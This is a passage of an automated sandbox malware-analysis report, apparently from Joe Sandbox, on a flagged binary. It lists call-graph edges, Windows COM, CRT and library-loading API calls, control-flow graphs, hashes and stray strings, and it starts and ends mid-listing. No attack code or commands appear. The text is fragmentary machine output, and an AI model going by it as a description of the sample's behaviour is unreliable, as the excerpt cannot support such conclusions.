SafeArrayGetUBound 59210 6d022a20 SafeArrayGetElement 59208->59210 59214 6d022c53 59208->59214 59209 6d022d1a SafeArrayDestroy 59209->59207 59210->59214 59210->59216 59211 6d022ab6 VariantInit 59211->59216 59212 6d022b3a VariantInit 59212->59216 59213 6d022c8b VariantClear VariantClear 59213->59214 59214->59207 59214->59209 59215 6d022d3a VariantClear VariantClear VariantClear 59215->59214 59216->59207 59216->59208 59216->59210 59216->59211 59216->59212 59216->59213 59216->59214 59216->59215 59217 6d022cb6 VariantClear VariantClear VariantClear 59216->59217 59218 6d022bf9 VariantClear VariantClear VariantClear 59216->59218 59217->59214 59218->59216 59221 6d069bb5 77 API calls 59220->59221 59222 6d02d32f 59221->59222 59223 6d02d3db 59222->59223 59224 6d02d33e 59222->59224 59281 6d069533 66 API calls std::exception::_Copy_str 59223->59281 59270 6d02c530 VariantInit VariantInit SafeArrayCreateVector 59224->59270 59226 6d02d3ed 59282 6d06ac75 RaiseException 59226->59282 59229 6d02d404 59231 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59232 6d02d3d5 59231->59232 59232->59147 59233->59067 59234->59073 59235->59075 59236->59078 59237->59084 59238->59086 59239->59147 59240->59149 59241->59151 59242->59157 59243->59167 59244->59173 59245->59175 59246->59146 59247->59182 59251 6d01db8c 59248->59251 59249 6d01dbf0 SafeArrayDestroy 59250 6d01dbf7 VariantClear 59249->59250 59250->59201 59251->59249 59251->59250 59253 6d0256e0 59252->59253 59254 6d0256f4 59252->59254 59253->59254 59267 6d0257c0 81 API calls std::_Xinvalid_argument 59253->59267 59257 6d025744 59254->59257 59258 6d02570d VariantInit VariantCopy 59254->59258 59268 6d0257c0 81 API calls std::_Xinvalid_argument 59254->59268 59259 6d026880 VariantInit VariantInit 59257->59259 59258->59254 59258->59257 59269 6d0691e1 59259->59269 59261 6d0268cd SafeArrayCreateVector SafeArrayPutElement VariantClear 59262 6d026913 SafeArrayPutElement 59261->59262 59266 6d02692d 59261->59266 59262->59266 59263 6d026980 SafeArrayDestroy 59264 6d026987 59263->59264 59265 6d026994 VariantClear VariantClear 59264->59265 59265->59205 59266->59263 59266->59264 59267->59254 59268->59254 59271 6d02c5a4 59270->59271 59272 6d02c5ac SafeArrayPutElement VariantClear 59270->59272 59271->59272 59273 6d02c7e4 59272->59273 59277 6d02c5cf 59272->59277 59274 6d02c7f0 SafeArrayDestroy 59273->59274 59275 6d02c7f7 VariantClear VariantClear 59273->59275 59274->59275 59276 6d02c817 59275->59276 59276->59231 59277->59273 59278 6d02c7d9 59277->59278 59286 6d06919e 67 API calls 3 library calls 59277->59286 59283 6d02df70 59278->59283 59281->59226 59282->59229 59287 6d02d410 59283->59287 59285 6d02df80 59285->59273 59286->59278 59288 6d02d472 VariantInit VariantInit VariantInit 59287->59288 59289 6d02d44e 59287->59289 59301 6d02d470 _memmove 59288->59301 59289->59285 59290 6d02d704 VariantClear VariantClear VariantClear 59292 6d02d75d 59290->59292 59290->59301 59291 6d069d66 _malloc 66 API calls 59291->59301 59292->59285 59293 6d02d579 SafeArrayCreateVector SafeArrayCreateVector SafeArrayAccessData 59293->59301 59294 6d02d5ec SafeArrayPutElement 59294->59301 59295 6d02d5d6 SafeArrayUnaccessData 59295->59294 59296 6d02d633 SafeArrayPutElement VariantClear 59296->59301 59298 6d02d6fa SafeArrayDestroy 59298->59301 59299 6d01db30 5 API calls 59299->59301 59300 6d0256b0 83 API calls 59300->59301 59301->59288 59301->59290 59301->59291 59301->59292 59301->59293 59301->59294 59301->59295 59301->59296 59301->59298 59301->59299 59301->59300 59302 6d026880 9 API calls 59301->59302 59303 6d069d2c 66 API calls 2 library calls 59301->59303 59302->59301 59303->59301 59304 6d06a510 59305 6d06a515 59304->59305 59307 6d06fe93 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 59304->59307 59307->59305 59308 6d06a42d 59309 6d06a438 59308->59309 59314 6d06a4b8 ___BuildCatchObjectHelper 59308->59314 59313 6d06a468 59309->59313 59309->59314 59316 6d06a2ab 59309->59316 59311 6d06a498 59312 6d06a2ab __CRT_INIT@12 149 API calls 59311->59312 59311->59314 59312->59314 59313->59311 59313->59314 59315 6d06a2ab __CRT_INIT@12 149 API calls 59313->59315 59315->59311 59317 6d06a2b7 ___BuildCatchObjectHelper 59316->59317 59318 6d06a2bf 59317->59318 59319 6d06a339 59317->59319 59368 6d06e904 HeapCreate 59318->59368 59320 6d06a33f 59319->59320 59321 6d06a39a 59319->59321 59328 6d06a35d 59320->59328 59334 6d06a2c8 ___BuildCatchObjectHelper 59320->59334 59378 6d06d4e7 66 API calls _doexit 59320->59378 59324 6d06a39f 59321->59324 59325 6d06a3f8 59321->59325 59323 6d06a2c4 59327 6d06a2cf 59323->59327 59323->59334 59326 6d06e948 ___set_flsgetvalue 3 API calls 59324->59326 59325->59334 59386 6d06ec2f 79 API calls __freefls@4 59325->59386 59329 6d06a3a4 59326->59329 59369 6d06ec9d 86 API calls 5 library calls 59327->59369 59332 6d06a371 59328->59332 59379 6d06dd67 67 API calls __getptd_noexit 59328->59379 59383 6d06cb28 66 API calls __calloc_crt 59329->59383 59382 6d06a384 70 API calls __mtterm 59332->59382 59334->59313 59336 6d06a2d4 __RTC_Initialize 59340 6d06a2d8 59336->59340 59347 6d06a2e4 GetCommandLineA 59336->59347 59339 6d06a3b0 59339->59334 59342 6d06a3bc DecodePointer 59339->59342 59370 6d06e922 HeapDestroy 59340->59370 59341 6d06a367 59380 6d06e97c 70 API calls __getptd_noexit 59341->59380 59348 6d06a3d1 59342->59348 59345 6d06a2dd 59345->59334 59346 6d06a36c 59381 6d06e922 HeapDestroy 59346->59381 59371 6d06fc46 71 API calls 2 library calls 59347->59371 59351 6d06a3d5 59348->59351 59352 6d06a3ec 59348->59352 59384 6d06e9b9 66 API calls 4 library calls 59351->59384 59385 6d069d2c 66 API calls 2 library calls 59352->59385 59353 6d06a2f4 59372 6d06db22 73 API calls __calloc_crt 59353->59372 59357 6d06a3dc GetCurrentThreadId 59357->59334 59358 6d06a2fe 59359 6d06a302 59358->59359 59374 6d06fb8b 95 API calls 3 library calls 59358->59374 59373 6d06e97c 70 API calls __getptd_noexit 59359->59373 59362 6d06a30e 59363 6d06a322 59362->59363 59375 6d06f915 94 API calls 6 library calls 59362->59375 59363->59345 59377 6d06dd67 67 API calls __getptd_noexit 59363->59377 59366 6d06a317 59366->59363 59376 6d06d2fa 77 API calls 4 library calls 59366->59376 59368->59323 59369->59336 59370->59345 59371->59353 59372->59358 59373->59340 59374->59362 59375->59366 59376->59363 59377->59359 59378->59328 59379->59341 59380->59346 59381->59332 59382->59334 59383->59339 59384->59357 59385->59345 59386->59334 58823 6d02e2ce 58824 6d069bb5 77 API calls 58823->58824 58825 6d02e2d5 58824->58825 58826 6d02e2ee 58825->58826 58880 6d031fd0 58825->58880 58828 6d069bb5 77 API calls 58826->58828 58839 6d02e343 58826->58839 58831 6d02e327 58828->58831 58829 6d02e360 58832 6d069bb5 77 API calls 58829->58832 58830 6d02e3a6 58833 6d069bb5 77 API calls 58830->58833 58879 6d02e564 moneypunct 58830->58879 58905 6d02eae0 58831->58905 58834 6d02e367 58832->58834 58837 6d02e400 58833->58837 58920 6d031910 78 API calls 2 library calls 58834->58920 58835 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58838 6d02e76e 58835->58838 58842 6d069bb5 77 API calls 58837->58842 58839->58829 58839->58830 58841 6d02e384 58921 6d031b20 11 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 58841->58921 58843 6d02e428 58842->58843 58846 6d015050 77 API calls 58843->58846 58845 6d02e399 58845->58830 58847 6d02e442 58846->58847 58848 6d069bb5 77 API calls 58847->58848 58849 6d02e449 58848->58849 58850 6d015050 77 API calls 58849->58850 58851 6d02e463 58850->58851 58852 6d069bb5 77 API calls 58851->58852 58853 6d02e46a 58852->58853 58854 6d015050 77 API calls 58853->58854 58855 6d02e484 58854->58855 58856 6d069bb5 77 API calls 58855->58856 58857 6d02e48b 58856->58857 58858 6d015050 77 API calls 58857->58858 58859 6d02e4a5 58858->58859 58860 6d069bb5 77 API calls 58859->58860 58861 6d02e4ac 58860->58861 58862 6d015050 77 API calls 58861->58862 58863 6d02e4c6 58862->58863 58864 6d02e4d3 58863->58864 58922 6d06919e 67 API calls 3 library calls 58863->58922 58866 6d069bb5 77 API calls 58864->58866 58867 6d02e4e3 58866->58867 58868 6d015050 77 API calls 58867->58868 58869 6d02e4fd 58868->58869 58870 6d069bb5 77 API calls 58869->58870 58871 6d02e504 58870->58871 58872 6d015050 77 API calls 58871->58872 58873 6d02e51e 58872->58873 58874 6d069bb5 77 API calls 58873->58874 58875 6d02e525 58874->58875 58876 6d015050 77 API calls 58875->58876 58877 6d02e53f 58876->58877 58878 6d0116b0 327 API calls 58877->58878 58878->58879 58879->58835 58881 6d069bb5 77 API calls 58880->58881 58882 6d032013 58881->58882 58883 6d0321f3 58882->58883 58884 6d032020 58882->58884 58957 6d069533 66 API calls std::exception::_Copy_str 58883->58957 58923 6d036480 58884->58923 58887 6d03220b 58958 6d06ac75 RaiseException 58887->58958 58889 6d032226 58890 6d03206c 58939 6d0035f0 58890->58939 58892 6d03216e 58950 6d032300 58892->58950 58894 6d032194 58895 6d032300 77 API calls 58894->58895 58896 6d0321a0 58895->58896 58897 6d032300 77 API calls 58896->58897 58898 6d0321ad 58897->58898 58899 6d032300 77 API calls 58898->58899 58900 6d0321ba 58899->58900 58901 6d032300 77 API calls 58900->58901 58902 6d0321c6 58901->58902 58903 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58902->58903 58904 6d0321ef 58903->58904 58904->58826 58906 6d069bb5 77 API calls 58905->58906 58907 6d02eb17 58906->58907 58908 6d02eb22 58907->58908 58909 6d02f4c9 58907->58909 59003 6d06a25a GetSystemTimeAsFileTime 58908->59003 59011 6d069533 66 API calls std::exception::_Copy_str 58909->59011 58911 6d02f4dc 59012 6d06ac75 RaiseException 58911->59012 58914 6d02eb5b 59005 6d069dfa 58914->59005 58915 6d02f4f1 58920->58841 58921->58845 58922->58864 58924 6d03655d 58923->58924 58928 6d0364c8 58923->58928 58925 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58924->58925 58926 6d03657d 58925->58926 58926->58890 58927 6d03651d 58927->58924 58962 6d002f40 77 API calls 58927->58962 58928->58924 58928->58927 58959 6d002f40 77 API calls 58928->58959 58931 6d0364f5 58960 6d036400 77 API calls std::tr1::_Xweak 58931->58960 58932 6d036535 58963 6d036400 77 API calls std::tr1::_Xweak 58932->58963 58935 6d03650e 58961 6d06ac75 RaiseException 58935->58961 58936 6d03654e 58964 6d06ac75 RaiseException 58936->58964 58965 6d056d40 58939->58965 58942 6d036480 77 API calls 58943 6d00364c 58942->58943 58972 6d004b30 58943->58972 58945 6d0036a7 58976 6d0386e0 58945->58976 58947 6d0036bc 58948 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58947->58948 58949 6d003701 58948->58949 58949->58892 58951 6d03231d 58950->58951 58952 6d0323aa 58951->58952 58953 6d069bb5 77 API calls 58951->58953 58952->58894 58955 6d032331 58953->58955 58954 6d032374 moneypunct 58954->58894 58955->58954 59002 6d032480 77 API calls 58955->59002 58957->58887 58958->58889 58959->58931 58960->58935 58961->58927 58962->58932 58963->58936 58964->58924 58966 6d036480 77 API calls 58965->58966 58967 6d056d7f 58966->58967 58984 6d038d80 58967->58984 58970 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58971 6d003630 58970->58971 58971->58942 58973 6d004b65 58972->58973 58994 6d004fa0 58973->58994 58975 6d004b7f 58975->58945 58977 6d038728 58976->58977 58978 6d038765 58977->58978 59000 6d037cd0 77 API calls 3 library calls 58977->59000 58979 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58978->58979 58980 6d03878a 58979->58980 58980->58947 58982 6d038756 59001 6d06ac75 RaiseException 58982->59001 58985 6d069d66 _malloc 66 API calls 58984->58985 58989 6d038d8f 58985->58989 58986 6d038dbb 58986->58970 58987 6d0691f6 70 API calls 58987->58989 58988 6d038dc1 std::exception::exception 58993 6d06ac75 RaiseException 58988->58993 58989->58986 58989->58987 58989->58988 58992 6d069d66 _malloc 66 API calls 58989->58992 58991 6d038df0 58992->58989 58993->58991 58995 6d069bb5 77 API calls 58994->58995 58997 6d004fcf 58995->58997 58996 6d004ff1 58996->58975 58997->58996 58999 6d005050 81 API calls _memcpy_s 58997->58999 58999->58996 59000->58982 59001->58978 59002->58952 59004 6d06a28a __aulldiv 59003->59004 59004->58914 59013 6d06eae6 59005->59013 59008 6d069e0c 59009 6d06eae6 __getptd 66 API calls 59008->59009 59010 6d02eb69 59009->59010 59010->58839 59011->58911 59012->58915 59018 6d06ea6d GetLastError 59013->59018 59015 6d06eaee 59017 6d02eb61 59015->59017 59033 6d06d4f6 66 API calls 3 library calls 59015->59033 59017->59008 59034 6d06e948 TlsGetValue 59018->59034 59021 6d06ea8c 59037 6d06cb28 66 API calls __calloc_crt 59021->59037 59022 6d06eada SetLastError 59022->59015 59024 6d06ea98 59024->59022 59025 6d06eaa0 DecodePointer 59024->59025 59026 6d06eab5 59025->59026 59027 6d06ead1 59026->59027 59028 6d06eab9 59026->59028 59039 6d069d2c 66 API calls 2 library calls 59027->59039 59038 6d06e9b9 66 API calls 4 library calls 59028->59038 59031 6d06eac1 GetCurrentThreadId 59031->59022 59032 6d06ead7 59032->59022 59035 6d06e95d DecodePointer TlsSetValue 59034->59035 59036 6d06e978 59034->59036 59035->59036 59036->59021 59036->59022 59037->59024 59038->59031 59039->59032 59387 6d0316af 59388 6d0316b4 59387->59388 59389 6d03170f 59388->59389 59390 6d069bb5 77 API calls 59388->59390 59391 6d031769 59389->59391 59394 6d069bb5 77 API calls 59389->59394 59392 6d0316cd 59390->59392 59393 6d0317c3 59391->59393 59397 6d069bb5 77 API calls 59391->59397 59395 6d0316e9 59392->59395 59437 6d02ea40 59392->59437 59396 6d03181d 59393->59396 59400 6d069bb5 77 API calls 59393->59400 59398 6d031727 59394->59398 59442 6d018400 59395->59442 59403 6d031877 59396->59403 59404 6d069bb5 77 API calls 59396->59404 59401 6d031781 59397->59401 59402 6d031743 59398->59402 59407 6d02ea40 78 API calls 59398->59407 59409 6d0317db 59400->59409 59411 6d02ea40 78 API calls 59401->59411 59413 6d03179d 59401->59413 59408 6d018400 77 API calls 59402->59408 59406 6d0318d1 59403->59406 59412 6d069bb5 77 API calls 59403->59412 59415 6d031835 59404->59415 59407->59402 59416 6d03175f 59408->59416 59417 6d02ea40 78 API calls 59409->59417 59419 6d0317f7 59409->59419 59411->59413 59420 6d03188f 59412->59420 59421 6d018400 77 API calls 59413->59421 59414 6d031851 59428 6d018400 77 API calls 59414->59428 59415->59414 59423 6d02ea40 78 API calls 59415->59423 59451 6d0180b0 67 API calls moneypunct 59416->59451 59417->59419 59425 6d018400 77 API calls 59419->59425 59426 6d0318ab 59420->59426 59430 6d02ea40 78 API calls 59420->59430 59422 6d0317b9 59421->59422 59452 6d0180b0 67 API calls moneypunct 59422->59452 59423->59414 59429 6d031813 59425->59429 59431 6d018400 77 API calls 59426->59431 59432 6d03186d 59428->59432 59453 6d0180b0 67 API calls moneypunct 59429->59453 59430->59426 59434 6d0318c7 59431->59434 59454 6d0180b0 67 API calls moneypunct 59432->59454 59455 6d0180b0 67 API calls moneypunct 59434->59455 59438 6d069bb5 77 API calls 59437->59438 59439 6d02ea6b 59438->59439 59440 6d02ea7e SysAllocString 59439->59440 59441 6d02ea99 59439->59441 59440->59441 59441->59395 59443 6d069bb5 77 API calls 59442->59443 59444 6d01840d 59443->59444 59445 6d018416 59444->59445 59456 6d069533 66 API calls std::exception::_Copy_str 59444->59456 59450 6d0180b0 67 API calls moneypunct 59445->59450 59447 6d01844e 59457 6d06ac75 RaiseException 59447->59457 59449 6d018463 59450->59389 59451->59391 59452->59393 59453->59396 59454->59403 59455->59406 59456->59447 59457->59449

                                                                                          Executed Functions

                                                                                          Function 6D02B6B0 Relevance: 35.2, APIs: 23, Instructions: 669COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 718 6d02b6b0-6d02b758 VariantInit * 2 719 6d02b764-6d02b769 718->719 720 6d02b75a-6d02b75f call 6d07c1e0 718->720 722 6d02b773-6d02b784 719->722 723 6d02b76b-6d02b770 719->723 720->719 725 6d02be96-6d02beb4 VariantClear * 2 722->725 726 6d02b78a-6d02b791 722->726 723->722 727 6d02beb6-6d02bebb 725->727 728 6d02bebe-6d02beca 725->728 729 6d02b793-6d02b798 726->729 730 6d02b7b9-6d02b7e2 SafeArrayCreateVector 726->730 727->728 731 6d02bed4-6d02bef2 call 6d06948b 728->731 732 6d02becc-6d02bed1 728->732 733 6d02b7a2-6d02b7b3 729->733 734 6d02b79a-6d02b79f 729->734 735 6d02b7e4-6d02b7e7 730->735 736 6d02b7ec-6d02b809 SafeArrayPutElement VariantClear 730->736 732->731 733->725 733->730 734->733 735->736 737 6d02be85-6d02be8d 736->737 738 6d02b80f-6d02b81d 736->738 737->725 740 6d02be8f-6d02be90 SafeArrayDestroy 737->740 741 6d02b829-6d02b841 738->741 742 6d02b81f-6d02b824 call 6d07c1e0 738->742 740->725 741->737 747 6d02b847-6d02b853 741->747 742->741 747->737 748 6d02b859-6d02b85e 747->748 748->737 749 6d02b864-6d02b86b 748->749 750 6d02b913-6d02b917 749->750 751 6d02b871-6d02b87e 749->751 752 6d02b921-6d02b941 call 6d01dcd0 750->752 753 6d02b919-6d02b91b 750->753 754 6d02b880-6d02b882 751->754 755 6d02b888-6d02b8f8 call 6d02dbc0 call 6d025790 call 6d02c850 751->755 752->737 761 6d02b947-6d02b964 call 6d01dcd0 752->761 753->737 753->752 754->737 754->755 770 6d02b904-6d02b90e call 6d02e800 755->770 771 6d02b8fa-6d02b8ff call 6d02e800 755->771 761->737 766 6d02b96a-6d02b96d 761->766 768 6d02b993-6d02b9bf 766->768 769 6d02b96f-6d02b98d call 6d01dcd0 766->769 774 6d02b9c1-6d02b9c6 call 6d07c1e0 768->774 775 6d02b9cb-6d02ba1d VariantClear 768->775 769->737 769->768 770->768 781 6d02be83 771->781 774->775 775->737 783 6d02ba23-6d02ba31 775->783 781->737 784 6d02ba33-6d02ba38 call 6d07c1e0 783->784 785 6d02ba3d-6d02ba8b 783->785 784->785 785->737 788 6d02ba91-6d02ba95 785->788 788->737 789 6d02ba9b-6d02baa7 call 6d069bb5 788->789 792 6d02bab6 789->792 793 6d02baa9-6d02bab4 789->793 794 6d02bab8-6d02bacc call 6d02bf00 792->794 793->794 794->737 797 6d02bad2-6d02bada 794->797 798 6d02baf3-6d02baf8 797->798 799 6d02badc-6d02bae6 call 6d0247d0 797->799 800 6d02bb11-6d02bb2e call 6d0249b0 798->800 801 6d02bafa-6d02bb0b call 6d0247d0 798->801 805 6d02baeb-6d02baed 799->805 800->737 808 6d02bb34-6d02bb4b call 6d02cd20 800->808 801->737 801->800 805->737 805->798 808->737 811 6d02bb51-6d02bb8e call 6d025790 call 6d024170 808->811 816 6d02bb90-6d02bb95 call 6d02e800 811->816 817 6d02bb9a-6d02bba8 call 6d02e800 811->817 816->781 822 6d02bca2 817->822 823 6d02bbae-6d02bbc0 817->823 825 6d02bca8-6d02bcae 822->825 823->822 824 6d02bbc6-6d02bc5b call 6d01c4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6d02db10 823->824 838 6d02bc60-6d02bc75 824->838 826 6d02bcb4-6d02bcc6 825->826 827 6d02bd78-6d02bdc8 825->827 826->827 829 6d02bccc-6d02bd76 call 6d01c4a0 VariantInit * 2 SafeArrayCreateVector SafeArrayPutElement VariantClear call 6d02db10 VariantClear * 2 826->829 827->781 839 6d02bdce-6d02bdd7 827->839 829->827 841 6d02bc90-6d02bca0 VariantClear * 2 838->841 842 6d02bc77-6d02bc8d 838->842 839->781 843 6d02bddd-6d02bde4 839->843 841->825 842->841 843->781 845 6d02bdea-6d02be03 call 6d069bb5 843->845 848 6d02be12 845->848 849 6d02be05-6d02be10 call 6d01c4a0 845->849 851 6d02be14-6d02be3c 848->851 849->851 853 6d02be3e-6d02be50 851->853 854 6d02be7f 851->854 853->854 855 6d02be52-6d02be65 call 6d069bb5 853->855 854->781 858 6d02be71 855->858 859 6d02be67-6d02be6f call 6d01c4a0 855->859 861 6d02be73-6d02be7c 858->861 859->861 861->854
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02B73F
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02B748
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02B7BE
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02B7F5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02B801
                                                                                            • Part of subcall function 6D02C850: VariantInit.OLEAUT32(?), ref: 6D02C88F
                                                                                            • Part of subcall function 6D02C850: VariantInit.OLEAUT32(?), ref: 6D02C895
                                                                                            • Part of subcall function 6D02C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C8A0
                                                                                            • Part of subcall function 6D02C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02C8D5
                                                                                            • Part of subcall function 6D02C850: VariantClear.OLEAUT32(?), ref: 6D02C8E1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02BA15
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02BE90
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02BEA3
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02BEA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                                                          • String ID:
                                                                                          • API String ID: 2012514194-0
                                                                                          • Opcode ID: 1155bf0f81c24c7213ba681b333cfe15e2686a7953a1c7854f26c88b587db655
                                                                                          • Instruction ID: ead2cb8ae8bbbc9c4f9e44c934e4cd614c56064ba0bfc3c8e1422cb6fda7dd80
                                                                                          • Opcode Fuzzy Hash: 1155bf0f81c24c7213ba681b333cfe15e2686a7953a1c7854f26c88b587db655
                                                                                          • Instruction Fuzzy Hash: C8525A71901219DFDF10CFA8C880BEEBBF6BF89310F158199E909AB355DB70A945CB91
                                                                                          Function 05CC0EB3 Relevance: 29.6, Strings: 23, Instructions: 800COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 863 5cc0eb3-5cc0ece 865 5cc19bb-5cc19bf 863->865 866 5cc0ed4-5cc0ee6 863->866 867 5cc19c1-5cc19cd 865->867 868 5cc19d2-5cc1a58 865->868 872 5cc0ee8-5cc0f0a 866->872 873 5cc0f15-5cc0f36 866->873 869 5cc1ee8-5cc1ef5 867->869 885 5cc1a5a-5cc1a66 868->885 886 5cc1a82 868->886 872->873 877 5cc0f3c-5cc0f52 872->877 873->877 878 5cc0f5e-5cc1042 877->878 879 5cc0f54-5cc0f58 877->879 900 5cc106c 878->900 901 5cc1044-5cc1050 878->901 879->865 879->878 887 5cc1a68-5cc1a6e 885->887 888 5cc1a70-5cc1a76 885->888 889 5cc1a88-5cc1acd 886->889 891 5cc1a80 887->891 888->891 1020 5cc1ad0 call 543b2a0 889->1020 1021 5cc1ad0 call 543b299 889->1021 891->889 894 5cc1ad2-5cc1adf 896 5cc1ae5-5cc1b0e 894->896 897 5cc1ae1 894->897 902 5cc1b14-5cc1b40 896->902 903 5cc1c40-5cc1c47 896->903 897->896 906 5cc1072-5cc1124 900->906 904 5cc105a-5cc1060 901->904 905 5cc1052-5cc1058 901->905 911 5cc1b47-5cc1b82 902->911 912 5cc1b42 902->912 907 5cc1c4d-5cc1d4c 903->907 908 5cc1d4f-5cc1db0 903->908 910 5cc106a 904->910 905->910 927 5cc114e 906->927 928 5cc1126-5cc1132 906->928 907->908 908->869 910->906 911->903 912->911 930 5cc1154-5cc116f 927->930 931 5cc113c-5cc1142 928->931 932 5cc1134-5cc113a 928->932 936 5cc1199 930->936 937 5cc1171-5cc117d 930->937 933 5cc114c 931->933 932->933 933->930 941 5cc119f-5cc11bd 936->941 938 5cc117f-5cc1185 937->938 939 5cc1187-5cc118d 937->939 942 5cc1197 938->942 939->942 945 5cc12db-5cc13bf 941->945 946 5cc11c3-5cc12c3 941->946 942->941 960 5cc13e9 945->960 961 5cc13c1-5cc13cd 945->961 946->945 965 5cc13ef-5cc1444 960->965 962 5cc13cf-5cc13d5 961->962 963 5cc13d7-5cc13dd 961->963 966 5cc13e7 962->966 963->966 973 5cc144a-5cc1549 965->973 974 5cc1562-5cc1638 965->974 966->965 973->974 974->865 983 5cc163e-5cc1647 974->983 985 5cc1649-5cc164c 983->985 986 5cc1652-5cc1751 983->986 985->986 987 5cc176a-5cc1781 985->987 986->987 987->865 992 5cc1787-5cc1898 987->992 1008 5cc189a-5cc189d 992->1008 1009 5cc18a3-5cc19a2 992->1009 1008->865 1008->1009 1009->865 1020->894 1021->894
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<^q$p<^q$p<^q$p<^q$Gvq$Gvq$Gvq$Gvq$Gvq
                                                                                          • API String ID: 0-3728642687
                                                                                          • Opcode ID: 357c35e6a6916a9041fd8635ef2f6353adf63f95f9d4c85fb1fce37b650a8554
                                                                                          • Instruction ID: 96b4654169d5a67d8ee9b58b0f1fab47b8862b73dffcdf1f058c7db8b9d89207
                                                                                          • Opcode Fuzzy Hash: 357c35e6a6916a9041fd8635ef2f6353adf63f95f9d4c85fb1fce37b650a8554
                                                                                          • Instruction Fuzzy Hash: D582B274E002298FDB64DF69C988BD9BBB2BB48300F1485E9D50DAB365DB349E85CF50
                                                                                          Function 6D01B6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1441 6d01b6c0-6d01b715 GetModuleHandleW 1442 6d01b717-6d01b724 LoadLibraryW 1441->1442 1443 6d01b72a-6d01b738 GetProcAddress 1441->1443 1442->1443 1444 6d01b94c-6d01b954 1442->1444 1443->1444 1445 6d01b73e-6d01b750 1443->1445 1446 6d01b956-6d01b95b 1444->1446 1447 6d01b95e-6d01b96a 1444->1447 1445->1444 1452 6d01b756-6d01b771 1445->1452 1446->1447 1448 6d01b974-6d01b98f call 6d06948b 1447->1448 1449 6d01b96c-6d01b971 1447->1449 1449->1448 1452->1444 1455 6d01b777-6d01b788 1452->1455 1455->1444 1457 6d01b78e-6d01b791 1455->1457 1457->1444 1458 6d01b797-6d01b7b2 1457->1458 1458->1444 1460 6d01b7b8-6d01b7c5 1458->1460 1460->1444 1462 6d01b7cb-6d01b7d0 1460->1462 1463 6d01b7d2-6d01b7d7 1462->1463 1464 6d01b7da-6d01b7e7 1462->1464 1463->1464 1465 6d01b7ec-6d01b7ee 1464->1465 1465->1444 1466 6d01b7f4-6d01b7f9 1465->1466 1467 6d01b805-6d01b80a 1466->1467 1468 6d01b7fb-6d01b800 call 6d07c1e0 1466->1468 1470 6d01b814-6d01b829 1467->1470 1471 6d01b80c-6d01b811 1467->1471 1468->1467 1470->1444 1473 6d01b82f-6d01b849 1470->1473 1471->1470 1474 6d01b850-6d01b85b 1473->1474 1474->1474 1475 6d01b85d-6d01b8a4 call 6d06a116 GetModuleHandleW 1474->1475 1475->1444 1478 6d01b8aa-6d01b8c1 1475->1478 1479 